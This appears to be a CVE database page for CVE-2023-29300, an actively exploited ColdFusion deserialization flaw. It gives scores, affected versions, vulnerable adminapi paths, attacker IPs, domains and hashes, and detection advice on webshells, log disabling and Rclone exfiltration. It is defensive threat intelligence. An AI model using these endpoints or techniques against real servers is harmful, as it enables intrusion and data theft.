cbcvebase.
CVE-2023-29300
published 2023-07-12

CVE-2023-29300: Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2024-01-29
Exploited in the wild
EPSS
99.98%
100.0th percentile
Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.

Affected

4 ranges
VendorProductVersion rangeFixed in
adobecoldfusion<= cf2023U1
adobecoldfusion
adobecoldfusion
adobecoldfusion

Detection & IOCsextracted from sources · hover to see the quote

path/CFIDE/adminapi/_datasource/setmsaccessRegistry.cfm
path/CFIDE/adminapi/_datasource/setsldatasource.cfm
path/CFIDE/adminapi/_datasource/setdsn.cfm
path/CFIDE/adminapi/_datasource/formatjdbcurl.cfm
path/CFIDE/adminapi/_datasource/getaccessdefaultsfromRegistry.cfm
path/CFIDE/adminapi/_datasource/geturldefaults.cfm
path/CFIDE/adminapi/customtags/l10n.cfm
path/CFIDE/adminapi/serverinstance.cfc
path/CFIDE/adminapi/servermonitoring.cfc
ip103.255.177.55
port6895
domainmooo-ng.com
domainredteam.tf
domainh4ck4fun.xyz
hash7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
hash590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
hash808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
hash4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
filenameUA4fp7R.aspx
filenameWRBYTR5750images.aspx
bytes
ONEPIECE
bytes
x_best_911
snort
Adobe.ColdFusion.CVE-2023-29300.Insecure.Deserialization
  • Post-exploitation webshells dropped in wwwroot\Images as .aspx files using steganography — alert on .aspx file creation in image directories and w3wp.exe spawning OS commands like whoami.
  • Webshells in this campaign embed the ASCII strings 'ONEPIECE' and 'x_best_911' as operational response tokens — scan .aspx files on web servers for these embedded strings.
  • Malware payloads are Base64-encoded and delivered from a public HTTP file server (HFS) at 103.255.177.55:6895 — block this IP/port and alert on Base64-encoded payloads in ColdFusion POST bodies.
  • Post-exploitation defence impairment script 'i.bat' disables IIS logging, Defender, Sysmon, and other security tools — alert on appcmd.exe setting dontLog:True and bulk Set-MpPreference cmdlets executed in sequence.
  • Rclone renamed to svhost.exe or scvhost.exe used for data exfiltration to MegaSync — alert on processes named svhost.exe or scvhost.exe making outbound cloud storage connections.
  • ·CVE-2023-29300 exploitation in the wild has been observed chained with CVE-2023-29298 (access control bypass) — the access control bypass is used to reach the adminapi endpoints that are then targeted for deserialization exploitation, so both CVEs should be treated as a combined attack chain.
  • ·Storm-0501 attribution to CVE-2023-29300 exploitation is assessed with uncertainty — Microsoft notes the initial access was 'possibly CVE-2023-29300 or CVE-2023-38203', so detections should cover both deserialization CVEs.
  • ·The Huntress incident had insufficient logging, preventing definitive confirmation that CVE-2023-29300 was the initial access vector — the CFIDE endpoint hits in logs are circumstantial evidence only.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.